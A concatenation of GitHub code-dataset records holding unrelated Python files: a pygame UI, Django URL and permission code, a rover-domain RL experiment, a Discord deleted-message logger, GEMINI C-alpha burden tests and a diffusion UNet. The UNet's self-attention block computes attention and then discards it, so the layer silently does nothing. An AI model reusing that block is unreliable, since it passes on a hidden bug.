angle_45_increase), 3)\n\n\t\t\telif angle == Direction.DOWN_FRONT.value:\n\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x + 3, pos_y + 3), (pos_x + line_size , pos_y + line_size ), 3)\n\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x + line_size , pos_y + line_size ), \n\t\t\t\t\t(pos_x + line_size - arrow_size - angle_45_increase, pos_y + line_size ), 3)\n\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x + line_size , pos_y + line_size ), \n\t\t\t\t\t(pos_x + line_size , pos_y + line_size - arrow_size - angle_45_increase), 3)\n\n\t\t\telse:\n\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x - 3, pos_y + 3), (pos_x - line_size , pos_y + line_size ), 3)\n\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x - line_size , pos_y + line_size ), \n\t\t\t\t\t(pos_x - line_size + arrow_size + angle_45_increase, pos_y + line_size ), 3)\n\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x - line_size , pos_y + line_size ), \n\t\t\t\t\t(pos_x - line_size , pos_y + line_size - arrow_size - angle_45_increase), 3)","repo_name":"miguelTavora/Artificial-Intelligence-2","sub_path":"reinforcement_learning/iasc-obj-2/src/lib/user_interface/user_interface.py","file_name":"user_interface.py","file_ext":"py","file_size_in_byte":6940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70401036625","text":"from django.urls import include, path\nfrom rest_framework import routers\nfrom rest_framework.authtoken import views\n\nfrom .views import CommentViewSet, FollowViewSet, GroupViewSet, PostViewSet\n\napp_name = 'api'\n\nrouter = routers.DefaultRouter()\nrouter.register('posts', PostViewSet)\nrouter.register('groups', GroupViewSet)\nrouter.register(r'posts/(?P\\d+)/comments', CommentViewSet,\n basename=\"comments\")\nrouter.register('follow', FollowViewSet, basename=\"follows\")\n\n\nurlpatterns = [\n path('v1/api-token-auth/', views.obtain_auth_token),\n path('v1/', include(router.urls)),\n]\n","repo_name":"Andrei191/api_final_yatube","sub_path":"yatube_api/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25426123259","text":"\"\"\"\nAn example using the rover domain gym-style interface and the standard, included CCEA learning algorithms.\nThis is a minimal example, showing the minimal Gym interface.\n\"\"\"\nfrom os import killpg\nimport numpy as np\nimport sys\nimport multiprocessing as mp\n\n\nfrom rover_domain_core_gym import RoverDomainGym\nimport code.ccea_2 as ccea\nimport code.agent_domain_2 as domain\n\n#import mods\nfrom teaming.learnmtl import learner\nfrom sys import argv\nimport pickle\n#import tensorflow as tf\nimport time\n\ndef rand_loc(n):\n x,y=np.random.random(2)\n pos=[[x,y]]\n while len(pos)<6:\n X,Y=np.random.random(2)\n for x,y in pos:\n dist=((X-x)**2.0+(Y-y)**2.0 )**0.5\n if dist<0.2:\n X=None \n break\n if not X is None: \n pos.append([X,Y])\n \n return np.array(pos)\n\n\n#pri alignment multiagent tumernt(vals)\ndef make_env(nagents,rand=0):\n vals =np.array([0.8,1.0,0.6,0.3,0.2,0.1])\n \n if rand:\n pos=np.array([\n [0.0, 0.2],\n [0.7, 0.1],\n [1.0, 0.3],\n [0.4, 0.6],\n [0.3, 0.3],\n [0.4, 0.9]\n ])\n else:\n pos=np.array([\n [0.0, 0.0],\n [1.0, 1.0],\n [0.0, 1.0],\n [1.0, 0.5],\n [0.0, 0.5],\n [1.0, 0.0]\n ])\n \n #pos=rand_loc(6)#np.random.random((6,2))\n #vals=np.random.random(6)/2.0\n print(vals)\n\n sim = RoverDomainGym(nagents,30,pos,vals)\n \n\n\n sim.data[\"Coupling\"]=2\n sim.data['Number of Agents']=nagents\n\n obs=sim.reset()\n return sim\n\n\ndef round_env(nagents,rand=0):\n vals =np.array([1.0]*nagents)\n t=np.linspace(0,2*np.pi,nagents,endpoint=False)\n \n pos = np.array([np.cos(t),np.sin(t)]).T\n pos=pos+0.5\n #print(pos)\n sim = RoverDomainGym(nagents,30,pos,vals)\n \n sim.data[\"Coupling\"]=1\n sim.data['Number of Agents']=nagents\n sim.data[\"Minimum Distance\"]=1.2\n sim.data[\"Observation Radius\"]=5.0\n obs=sim.reset()\n return sim\n\n\n\ndef test1(trial,k,n,train_flag,n_teams,save=1,params=None):\n #print(np.random.get_state())[1] \n np.random.seed(int(time.time()*100000)%100000)\n env=make_env(n)\n if params is None:\n params=[5e-3, 80, 32,1000]\n OBS=env.reset()\n\n controller = learner(n,k,env,train_flag,params)\n #controller.set_teams(n_teams)\n R=[]\n for i in range(2001):\n\n \n #controller.randomize()\n if i%100000==0:\n controller.set_teams(n_teams)\n\n if i%1==0:\n controller.test(env)\n\n r=controller.run(env,train_flag)\n if save:\n print(i,r,len(controller.team),train_flag)\n R.append(r)\n \n if i%50==0:\n #controller.save(\"tests/q\"+str(frq)+\"-\"+str(trial)+\".pkl\")\n #controller.save(\"logs/\"+str(trial)+\"r\"+str(16)+\".pkl\")\n #controller.save(\"tests/jj\"+str(121)+\"-\"+str(trial)+\".pkl\")\n #controller.log.clear(\"hist\")\n #controller.put(\"hist\",controller.hist)\n if save:\n controller.save(\"save/\"+str(k)+\"-\"+str(n)+\"-\"+str(trial)+\"-\"+str(train_flag)+\".pkl\")\n return -max(R[-20:])\n\n\n\n\ndef test2(trial,k,n,train_flag,n_teams,save=1,params=None):\n #print(np.random.get_state())[1] \n np.random.seed(int(time.time()*100000)%100000)\n env=round_env(n)\n if params is None:\n params=[5e-3, 80, 32,1000]\n OBS=env.reset()\n controller = learner(n,k,env,train_flag,params)\n #controller.set_teams(n_teams)\n R=[]\n for i in range(1501):\n if i%100000==0:\n controller.set_teams(n_teams)\n\n controller.test(env)\n\n r=controller.run(env,train_flag)\n if save:\n print(i,r,len(controller.team),train_flag)\n R.append(r)\n \n if i%50==0:\n if save:\n controller.save(\"save/r\"+str(k)+\"-\"+str(n)+\"-\"+str(trial)+\"-\"+str(train_flag)+\".pkl\")\n return -max(R[-20:])\n\n #train_flag=0 - align w/ shape\n #train_flag=1 - alignment network\n #train_flag=2 - g_hat\n #train_flag=3 - fitness critic\n #train_flag=4 - D*\n #train_flag=5 - G*\n #train_flag=6 - a shape train traj\n #train_flag=7 - align train traj\n #train_flag=8 - a shape train traj max\n #train_flag=9 - align train traj max\nif __name__==\"__main__\":\n if 0:\n import cProfile, pstats, io\n from pstats import SortKey\n pr = cProfile.Profile()\n pr.enable()\n # ... do something ...\n test1(42,5,4,1)\n pr.disable()\n s = io.StringIO()\n sortby = SortKey.CUMULATIVE\n ps = pstats.Stats(pr, stream=s).sort_stats(sortby)\n ps.print_stats()\n print(s.getvalue())\n \n else:\n for k in [4,6,8]:\n procs=[]\n for train in [2]:\n n=k\n teams=100\n params = [5e-4, 80, 24 ,30000,0,1]\n for i in range(12):\n p=mp.Process(target=test1,args=(i,k,n,train,teams,1,params))\n p.start()\n time.sleep(0.05)\n procs.append(p)\n #p.join()\n for p in procs:\n p.join()\n\n# 100 - static\n# 200 - minimax single\n# 300 random\n# 400 most similar","repo_name":"jaeioursh/credit","sub_path":"mtl.py","file_name":"mtl.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"366801575","text":"from abc import abstractmethod, ABCMeta\nfrom typing import List\n\nfrom api.api_dto.PermissionDto import *\nfrom api.models import Permission\n\n\nclass PermissionRepository(metaclass=ABCMeta):\n @abstractmethod\n def create_permission(self, model: CreatePermissionDto):\n \"\"\"Create a permission object\"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def update_permission(self, permission_id: str, model: UpdatePermissionDto):\n \"\"\"Update a permission object\"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def list_permission(self) -> List[ListPermissionDto]:\n \"\"\"List all Permission objects\"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def permission_details(self, permission_id, model: PermissionDetailsDto):\n \"\"\"Details of a particular permission object\"\"\"\n raise NotImplementedError\n\n\nclass DjangoORMPermissionRepository(PermissionRepository):\n def create_permission(self, model: CreatePermissionDto):\n permission = Permission()\n permission.id = model.id\n permission.name = model.name\n permission.description = model.description\n permission.date_created = model.date_created\n permission.save()\n\n def update_permission(self, permission_id: str, model: UpdatePermissionDto):\n try:\n permission = Permission.objects.get(id=permission_id)\n permission.name = model.name\n permission.description = model.description\n permission.save()\n except Permission.DoesNotExist as e:\n return e\n\n def list_permission(self) -> List[ListPermissionDto]:\n permissions = Permission.objects.all()\n results: List[ListPermissionDto] = []\n for permission in permissions:\n item = ListPermissionDto()\n item.name = permission.name\n item.description = permission.description\n results.append(item)\n return results\n\n def permission_details(self, permission_id, model: PermissionDetailsDto):\n try:\n permission = Permission.objects.get(id=permission_id)\n result = PermissionDetailsDto()\n result.id = permission.id\n result.name = permission.name\n result.description = permission.description\n result.date_created = permission.date_created\n result.date_updated = permission.date_updated\n return result\n except Permission.DoesNotExist as e:\n return e\n","repo_name":"laken11/TMS","sub_path":"api/api_repository/PermissionRepository.py","file_name":"PermissionRepository.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11896991535","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nimport torch, tpr, sys\n\nclass Recorder:\n def __init__(self):\n self.record = {}\n\n # record (key,value) pairs\n def set_values(self, prefix, keyvals):\n for x,y in keyvals.items():\n self.record[prefix+'-'+x] = y.clone()\n\n # update record of (key,value) pairs\n def update_values(self, prefix, keyvals):\n for x,y in keyvals.items():\n x = prefix+'-'+x\n if not x in self.record:\n self.record[x] = [y.clone(),]\n else:\n self.record[x].append(y.clone())\n \n def dump(self, save=False, test=None):\n for x,y in self.record.items():\n if isinstance(y, list):\n y = [yi.unsqueeze(1) for yi in y]\n self.record[x] = torch.cat(y, dim=1)\n if save:\n # save all recorded objects\n for x,y in self.record.items():\n y = np.clip(y.data.numpy(), -1.0e5, 1.0e5)\n np.save(tpr.save_dir+'/'+x +'.npy', y)\n # write filler, role, unbinding matrices\n np.save(tpr.save_dir+'/filler_matrix.npy', tpr.F)\n np.save(tpr.save_dir+'/role_matrix.npy', tpr.R)\n np.save(tpr.save_dir+'/unbind_matrix.npy', tpr.U)\n # write symbols\n syms = np.array(tpr.seq_embedder.syms)\n np.savetxt(tpr.save_dir+'/symbols.txt', syms, fmt='%s')\n # write test forms\n if test is not None:\n test.to_csv(tpr.save_dir+'/test.csv', encoding='utf-8')\n return self.record\n\n def init(self):\n self.record = {}","repo_name":"ColemanHaley/tensormorph2","sub_path":"recorder.py","file_name":"recorder.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30987020386","text":"def fatorial(numero=1, show=True):\n \"\"\"\n -> Calcula o fatorial de um numero\n :param numero: O numero a ser calculado\n :param show: (opcional) mostrar ou não a conta\n :return: O valor do fatorial da variável numero\n \"\"\"\n f = 1\n for c in range(numero, 0, -1):\n f *= c\n if show:\n for k in range(numero, 0, -1):\n print(f'{k}', end='')\n print(' x ' if k > 1 else ' = ', end='')\n print(f)\n else:\n return f\n\n\nprint(fatorial(5, False))\nhelp(fatorial)\n\n\n\"\"\"\n# Resolução da aula\nf = 1\nfor c in range(numero, 0, -1):\n if show:\n print(c, end='')\n if c > 1:\n print(' x ', end='')\n else:\n print(' = ', end='')\n f *= c\n return f\n\"\"\"","repo_name":"nandakobs/curso_em_video.py","sub_path":"Mundo 03/PythonExercicios/ex102.py","file_name":"ex102.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22407916367","text":"import disnake\nfrom disnake.ext import commands\nimport os\nimport random\nimport config\n\nclass logging(commands.Cog):\n def __init__(self, bot):\n \tself.bot = bot\n \n @commands.Cog.listener()\n async def on_ready(self):\n print(f'Loaded Cog Logging')\n\n\n # logs deleted messages from all channels in the server\n @commands.Cog.listener()\n async def on_message_delete(self, message):\n if message.author.bot:\n return\n if message.guild.id == config.guild:\n for channel in config.logs:\n embed = disnake.Embed(title=f\"Message Deleted\", description=f\"**Message:** {message.content}\\n**Channel:** {message.channel.mention}\\n**Author:** {message.author.mention}\", color=config.Random)\n await self.bot.get_channel(channel).send(embed=embed)\n\n \ndef setup(bot):\n bot.add_cog(logging(bot))","repo_name":"Eto2112/twst","sub_path":"cogs/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2610901644","text":"from __future__ import print_function, absolute_import\nimport math\nfrom collections import Counter, defaultdict\nimport numpy as np\nfrom scipy.stats import binom, norm\nfrom pandas import DataFrame\nimport sys\nimport random\nfrom itertools import islice\nfrom scipy.misc import comb\n\n\nfrom . import GeminiQuery\n\n\ndef burden_by_gene(args):\n \"\"\"\n calculates per sample the total genetic burden for each gene\n \"\"\"\n query = (\"SELECT gene from variants WHERE \"\n \"is_coding=1 and (impact_severity = 'HIGH' or \"\n \"polyphen_pred = 'probably_damaging')\")\n _summarize_by_gene_and_sample(args, query)\n\n\ndef nonsynonymous_by_gene(args):\n \"\"\"\n calculates per sample the total genetic burden for each gene\n \"\"\"\n query = (\"SELECT variant_id, gene from variants WHERE \"\n \"codon_change != 'None'\")\n _summarize_by_gene_and_sample(args, query)\n\ndef get_calpha(args):\n \"\"\"\n Calculate the C-alpha statistic for each gene based on the observed\n counts of variants in cases and controls.\n\n From Neale et al, PLoS Genetics, 2011.\n http://www.plosgenetics.org/article/info%3Adoi%2F10.1371%2Fjournal.pgen.1001322\n \"\"\"\n db = args.db\n if not (args.controls and args.cases):\n case, control = _get_case_and_control_samples(args)\n else:\n case = args.cases\n control = args.controls\n assert (case and control), (\"Phenotypes not found in the database and \"\n \"--cases and --controls are not set.\")\n\n samples = control + case\n # p_0 = the fraction of samples that are cases (used for weighting)\n p_0 = float(len(case)) / float(len(samples))\n\n if args.nonsynonymous:\n ns = _nonsynonymous_variants(args)\n else:\n ns = _medium_or_high_impact_variants(args)\n\n variants_in_gene, variants = _calculate_counts(ns, samples)\n header = [\"gene\", \"T\", \"c\", \"Z\", \"p_value\"]\n print(\"\\t\".join(header))\n\n if args.permutations > 0:\n perms = permute_cases(samples, args.permutations, case)\n\n for gene in variants_in_gene:\n vig = variants_in_gene[gene]\n\n # m = the number of variants observed for this gene\n m = len(vig.keys())\n\n # m_n is the number of variants with n copies (i.e., samples with the variant)\n #m_n = Counter([len(x) for x in vig.values()])\n\n # n_i is a list reflecting the total number of samples\n # having each variant\n n_i = [len(x) for x in vig.values()]\n\n # y_i is a list reflecting the total number of __cases__\n # having each variant\n y_i = [sum(1 for _ in filter(lambda a: a in case, x)) for x in vig.values()]\n\n # \"The C-alpha test statistic T contrasts the variance of each observed\n # count with the expected variance, assuming the binomial distribution.\"\n # In other words, given that we have n total samples and p_0 * n of them\n # are cases, we _expect_ the variant copies to be distributed among the\n # samples following a binomal distribution. The T statistic contrasts\n # the observed count distributions with the expected:\n #\n # T = SUM{i=(1,m)} [(y_i - n_i*p_0)^2 - n_i*p_0(1 - p_0)]\n #\n T = _calculate_T(m, p_0, n_i, y_i)\n\n # Calculate the variance of T in order to normalize it\n c = _calculate_c(n_i, p_0)\n\n # The final test statistic, Z, id just the original test statistic divided\n # by its standard deviation. \"We reject the null when Z is larger than expected\n # using a one-tailed standard normal distribution for reference.\n if c == 0:\n Z = np.NaN\n p_value = np.NaN\n print(\"\\t\".join([gene, str(T), str(c), str(Z), str(p_value)]))\n continue\n else:\n Z = T / math.sqrt(c)\n\n if args.permutations == 0:\n # sf is the survival function ... same as 1 - CDF.\n p_value = norm.sf(Z)\n else:\n # this permutes the cases without replacement, important for\n # calculating an exact p-value\n T_scores = []\n for perm_case in perms:\n y_i = [sum(1 for _ in filter(lambda a: a in perm_case, x)) for x in vig.values()]\n T_permuted = _calculate_T(m, p_0, n_i, y_i)\n T_scores.append(T_permuted)\n if args.save_tscores:\n with open(\"permutated_t_scores.txt\", \"a\") as out_handle:\n out_handle.write(\"\\t\".join([gene] + map(str, T_scores)) + \"\\n\")\n false_hits = sum(x >= T for x in T_scores)\n # the + 1 to make it an unbiased estimator\n # Permutation P-values Should Never Be Zero: Calculating Exact\n # P-values When Permutations Are Randomly Drawn\n # http://www.degruyter.com/view/j/sagmb.2010.9.1/sagmb.2010.9.1.1585/sagmb.2010.9.1.1585.xml\n p_value = (float(false_hits) + 1) / (float(args.permutations + 1))\n\n print(\"\\t\".join([gene, str(T), str(c), str(Z), str(p_value)]))\n\n\ndef permute_cases(samples, permutations, case):\n max_permutations = comb(len(samples), len(case))\n if permutations > max_permutations:\n sys.stderr.write(\"Permutations set to greater than the maximum number of \"\n \"unique permutations of cases labels. Setting it to \"\n \"%d\\n.\" % (max_permutations))\n permutations = max_permutations\n\n perms = take(permutations, unique_permutations(samples, len(case)))\n return perms\n\ndef unique_permutations(iterable, length):\n \"\"\"\n returns random permutations from an iterable without repeating a set\n take(unique_permutations([1,2,3,4,5], 2), 3) => [3,4], [1,6], [3,5]\n \"\"\"\n seen = set()\n while True:\n element = tuple(sorted(random.sample(iterable, length)))\n if element not in seen:\n seen.add(element)\n yield list(element)\n\ndef take(n, iterable):\n \"Return first n items of the iterable as a list\"\n return list(islice(iterable, n))\n\n\ndef _get_case_and_control_samples(args):\n query = (\"SELECT * from samples\")\n gq = GeminiQuery.GeminiQuery(args.db)\n gq.run(query)\n cases = []\n controls = []\n for row in gq:\n if int(row[\"phenotype\"]) == 1:\n controls.append(row[\"name\"])\n elif int(row[\"phenotype\"]) == 2:\n cases.append(row[\"name\"])\n return cases, controls\n\n\ndef _calculate_c(n_i, p_0):\n c = 0.0\n singleton_n = 0\n for n in n_i:\n if n < 2:\n singleton_n += n\n continue\n for u in range(n + 1):\n c += _C_term(u, n, p_0)\n if singleton_n >= 2:\n for u in range(singleton_n + 1):\n c += _C_term(u, singleton_n, p_0)\n return c\n\n\ndef _C_term(u, n, p_0):\n p_obs_u = binom(n, p_0).pmf(u)\n return ((u - n * p_0)**2 - n * p_0 * (1 - p_0))**2 * p_obs_u\n\n\ndef _calculate_T(m, p_0, n_i, y_i):\n T = 0.0\n singleton_n = 0\n singleton_y = 0\n for n, y in zip(n_i, y_i):\n if n < 2:\n singleton_n += n\n singleton_y += y\n continue\n T += _variant_T_term(p_0, n, y)\n if singleton_n >= 2:\n T += _variant_T_term(p_0, singleton_n, singleton_y)\n return T\n\ndef _variant_T_term(p_0, n_i, y_i):\n return (y_i - n_i * p_0)**2 - n_i * p_0 * (1 - p_0)\n\n\ndef _nonsynonymous_variants(args):\n query = (\"SELECT variant_id, gene from variants WHERE \"\n \"codon_change != 'None'\")\n gq = GeminiQuery.GeminiQuery(args.db)\n gq.run(query, show_variant_samples=True)\n return gq\n\ndef _medium_or_high_impact_variants(args):\n query = (\"SELECT variant_id, gene from variants\"\n \" WHERE impact_severity != 'LOW'\"\n \" AND aaf >= %s\"\n \" AND aaf <= %s\" % (str(args.min_aaf), str(args.max_aaf)))\n\n gq = GeminiQuery.GeminiQuery(args.db)\n gq.run(query, show_variant_samples=True)\n return gq\n\ndef _calculate_counts(gq, samples):\n variants = defaultdict(Counter)\n variants_in_gene = defaultdict(defaultdict)\n for row in gq:\n gene_name = row['gene']\n samples_with_variant = [x for x in row[\"variant_samples\"] if\n x in samples]\n if not gene_name or not samples_with_variant:\n continue\n variants_in_gene[gene_name].update({row['variant_id']:\n samples_with_variant})\n new_counts = Counter(samples_with_variant)\n del new_counts['']\n variants[gene_name] += new_counts\n return variants_in_gene, variants\n\n\ndef _summarize_by_gene_and_sample(args, query):\n gq = GeminiQuery.GeminiQuery(args.db)\n gq.run(query, show_variant_samples=True)\n burden = defaultdict(Counter)\n for row in gq:\n gene_name = row['gene']\n if not gene_name:\n continue\n new_counts = Counter(row[\"het_samples\"])\n # Counter can't do scalar multiplication\n new_counts = new_counts + Counter(row[\"hom_alt_samples\"])\n new_counts = new_counts + Counter(row[\"hom_alt_samples\"])\n\n del new_counts['']\n burden[gene_name] += new_counts\n\n df = DataFrame({})\n for gene_name, counts in burden.items():\n df = df.append(DataFrame(counts, columns=counts.keys(),\n index=[gene_name]))\n df = df.replace(np.NaN, 0)\n df.to_csv(sys.stdout, float_format=\"%d\", sep=\"\\t\", index_label='gene')\n\n\ndef burden(parser, args):\n if args.nonsynonymous and not args.calpha:\n nonsynonymous_by_gene(args)\n elif args.calpha:\n get_calpha(args)\n else:\n burden_by_gene(args)\n\n\n# unit tests of the underlying calculations\ndef _test_calculate_C():\n nn = [4, 10, 5]\n yy = [2, 8, 0]\n correct = 15.250000000000007\n calc = _calculate_c(nn, 0.5)\n assert correct == calc\n\ndef _test_calculate_T():\n nn = [4, 10, 5]\n yy = [2, 8, 0]\n correct = 10.5\n\n calc = sum([_variant_T_term(0.5, n, y) for n, y in zip(nn, yy)])\n assert correct == calc\n","repo_name":"arq5x/gemini","sub_path":"gemini/tool_burden_tests.py","file_name":"tool_burden_tests.py","file_ext":"py","file_size_in_byte":9990,"program_lang":"python","lang":"en","doc_type":"code","stars":305,"dataset":"github-code","pt":"48"} +{"seq_id":"20084280850","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass UNet(nn.Module): \n def __init__(self, C, steps, channel_expansions=[1,2,4,4,8,8], emb_expansion=4, resblock_per_down_stage=3, drp_rate=0.0): # from the original code; set 0.1 for CIFAR10 and 0.0 for the others.\n super().__init__()\n self.emb = GammaEmbedding(steps=steps, dim=C, exp=emb_expansion)\n self.conv1 = Conv2d(2*3, C, 3)\n att_depth = len(channel_expansions)-2\n\n depth = len(channel_expansions) \n last_depth = depth-1\n resblock_per_up_stage = resblock_per_down_stage + 1 # to match block connections between up stage and down stage, where { Down_WideResBlock_1 -> Up_WideResBlock_1 }, { Down_WideResBlock_2 -> Up_WideResBlock_2 }, and { Down_Block -> Up_WideResBlock_3 }\n\n self.down = nn.ModuleList()\n channels = list()\n in_channel = C\n channels.append(in_channel)\n for d in range(depth):\n out_channel = channel_expansions[d] * C\n for _ in range(resblock_per_down_stage):\n res_block = WideResNetBlock(in_channel, out_channel, emb_dimension=emb_expansion*C, attention=d==att_depth, drp_rate=drp_rate)\n in_channel = out_channel\n self.down.append(res_block)\n channels.append(in_channel)\n\n if d < last_depth:\n self.down.append(DownBlock(in_channel, in_channel))\n channels.append(in_channel)\n\n self.mid = nn.ModuleList([\n WideResNetBlock(in_channel, in_channel, emb_dimension=emb_expansion*C, attention=True, drp_rate=drp_rate),\n WideResNetBlock(in_channel, in_channel, emb_dimension=emb_expansion*C, attention=False, drp_rate=drp_rate)\n ])\n\n self.up = nn.ModuleList()\n for d in reversed(range(depth)):\n out_channel = channel_expansions[d] * C\n for _ in reversed(range(resblock_per_up_stage)):\n res_block = WideResNetBlock(in_channel + channels.pop(), out_channel, emb_dimension=emb_expansion*C, attention=d==att_depth, drp_rate=drp_rate)\n in_channel = out_channel\n self.up.append(res_block)\n \n if d > 0:\n self.up.append(UpBlock(in_channel, in_channel))\n \n del channels\n\n self.gn = GroupNorm(channel_expansions[0]*C)\n self.silu = nn.SiLU()\n self.conv2 = Conv2d(channel_expansions[0]*C, 3, kernel=3, gain=1e-10)\n \n def forward(self, x, gamma):\n\n emb = self.emb(gamma)\n\n connections = list()\n\n z = self.conv1(x)\n connections.append(z)\n\n for module in self.down:\n z = module(z, emb) if isinstance(module, WideResNetBlock) else module(z)\n connections.append(z)\n \n for module in self.mid:\n z = module(z, emb)\n \n for module in self.up:\n z = module(torch.cat((z, connections.pop()), dim=1), emb) if isinstance(module, WideResNetBlock) else module(z)\n \n z = self.gn(z)\n z = self.silu(z)\n out = self.conv2(z)\n\n return out\n\nclass GammaEmbedding(nn.Module):\n def __init__(self, steps, dim, exp):\n super().__init__()\n self.linear1 = Linear(dim, exp*dim)\n self.silu = nn.SiLU()\n self.linear2 = Linear(exp*dim, exp*dim)\n self.dim=dim\n\n x = torch.log(torch.tensor(5000)) / (self.dim//2 - 1) # log( 5000^(1 / (d/2 - 1)) )\n x = torch.exp( torch.arange(0, dim//2) * -x ) # 1 / 5000^(i / (d/2 - 1)) \n self.register_buffer('x', x.reshape((1, -1)))\n\n def forward(self, gamma):\n \n x = gamma.reshape((-1, 1)) * self.x # gamma / 5000^(i / (d/2 - 1))\n emb = torch.concat((torch.sin(x), torch.cos(x)), dim=1) # sin( gamma / 5000^(i / (d/2 - 1)) ) and cos( gamma / 10000^(i / (d/2 - 1)) )\n if self.dim % 2 != 0:\n emb = F.pad(emb, pad=(0, 1)) # add zero pad at last\n \n emb = self.linear1(emb)\n emb = self.silu(emb)\n emb = self.linear2(emb)\n\n return emb # shape = (batch, exp*dim)\n\nclass WideResNetBlock(nn.Module): # DDPM ResBlock\n def __init__(self, in_channel, out_channel, emb_dimension, attention, drp_rate):\n super().__init__()\n self.do_attention = attention\n self.is_match = in_channel == out_channel\n self.C = out_channel\n\n self.gn1 = GroupNorm(in_channel)\n self.silu1 = nn.SiLU()\n self.conv1 = Conv2d(in_channel, out_channel, kernel=3)\n \n self.silu2 = nn.SiLU()\n self.linear1= Linear(emb_dimension, out_channel)\n\n self.gn2 = GroupNorm(out_channel)\n self.silu3 = nn.SiLU()\n self.dropout = nn.Dropout(drp_rate) \n self.conv2 = Conv2d(out_channel, out_channel, kernel=3, gain=1e-10)\n\n if not self.is_match: # to match 'channel' betweem 'x' and 'z'\n self.linear2 = Linear(in_channel, out_channel)\n \n if self.do_attention:\n self.att = SelfAttentionBlock(out_channel) \n \n\n def forward(self, x, emb):\n z = self.gn1(x)\n z = self.silu1(z)\n z = self.conv1(z)\n\n B = x.shape[0]\n C = self.C\n emb = self.silu2(emb)\n z = self.linear1(emb).reshape(B, C, 1, 1) + z\n\n z = self.gn2(z)\n z = self.silu3(z)\n z = self.dropout(z) \n z = self.conv2(z)\n\n if not self.is_match:\n x = x.permute(0, 2, 3, 1) # shape=(B,C,H,W) -> (B,H,W,C)\n x = self.linear2(x)\n x = x.permute(0, 3, 1, 2) # shape=(B,H,W,C) -> (B,C,H,W)\n\n out = x + z\n\n if self.do_attention:\n out = self.att(out)\n \n return out\n\nclass SelfAttentionBlock(nn.Module):\n def __init__(self, dim):\n super().__init__()\n self.gn = GroupNorm(dim)\n self.qkv = Linear(dim, 3*dim)\n self.softmax = nn.Softmax(dim=-1)\n self.proj = Linear(dim, dim, gain=1e-10)\n\n def forward(self, x):\n B, C, H, W = x.shape\n\n z = self.gn(x)\n z = z.permute(0, 2, 3, 1) # shape=(B,C,H,W) -> (B,H,W,C)\n qkv = self.qkv(z).view(B, H*W, 3, C).permute(2,0,1,3) # shape=(B,H,W,3*C) -> (3,B,H*W,C)\n q,k,v = qkv[0], qkv[1], qkv[2] # (B,H*W,C)\n\n w = torch.matmul(q, k.transpose(-2,-1)) / (C**0.5) # shape=(B,H*W,H*W)\n attention = self.softmax(w)\n self_attention = torch.matmul(attention, v) # shape=(B,H*W,C)\n\n z = self.proj(z).permute(0, 3, 1, 2).reshape(B, C, H, W)\n return x + z\n\nclass DownBlock(nn.Module):\n def __init__(self, in_channel, out_channel):\n super().__init__()\n self.conv = Conv2d(in_channel, out_channel, kernel=3, stride=2)\n \n def forward(self, x): \n return self.conv(x)\n\nclass UpBlock(nn.Module):\n def __init__(self, in_channel, out_channel):\n super().__init__()\n self.upsample = nn.Upsample(scale_factor=2, mode='nearest')\n self.conv = Conv2d(in_channel, out_channel, kernel=3)\n \n def forward(self, x): \n x = self.upsample(x)\n x = self.conv(x)\n return x\n\nclass GroupNorm(nn.Module):\n def __init__(self, in_channel, num_groups=8):\n super().__init__()\n self.group_norm = nn.GroupNorm(num_groups=num_groups, num_channels=in_channel) # same as the TensorFlow default\n\n def forward(self, x):\n return self.group_norm(x)\n\nclass Conv2d(nn.Module):\n def __init__(self, in_channel, out_channel, kernel, stride=1, gain=1.0):\n super().__init__()\n self.conv = nn.Conv2d(in_channel, out_channel, kernel, stride, padding=1)\n nn.init.xavier_uniform_(self.conv.weight, gain=torch.sqrt(torch.tensor(gain))) # the original code initialization\n nn.init.constant_(self.conv.bias, 0.0) # the original code initialization\n \n def forward(self, x):\n return self.conv(x)\n\nclass Linear(nn.Module):\n def __init__(self, in_feature, out_feature, gain=1.0):\n super().__init__()\n self.linear = nn.Linear(in_feature, out_feature)\n nn.init.xavier_uniform_(self.linear.weight, gain=torch.sqrt(torch.tensor(gain))) # the original code initialization\n nn.init.constant_(self.linear.bias, 0.0) # the original code initialization\n\n def forward(self, x):\n return self.linear(x)\n\n","repo_name":"novwaul/SR3","sub_path":"UNet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8300,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"6839608552","text":"from django.conf.urls import url\nfrom django.urls import path, include\nfrom . import views\nfrom bms.ui_views import main_user_views,user_group_view,agency_views,client_config_views,order_views,rule_views,msg_views,funds_views\n\napp_name = 'bms'\n\nurlpatterns = [\n\t# 首页\n\tpath('login',views.login_page,name='login'),\n\tpath('logout',views.Logout_page,name='logout'),\n\tpath('login_check',views.login_check,name='login_check'),\n\tpath('index', views.index, name='index'),\n\tpath('change_pwd_page',views.change_pwd_page,name='change_pwd_page'),\n\tpath('change_pwd',views.change_pwd,name='change_pwd'),\n\t# 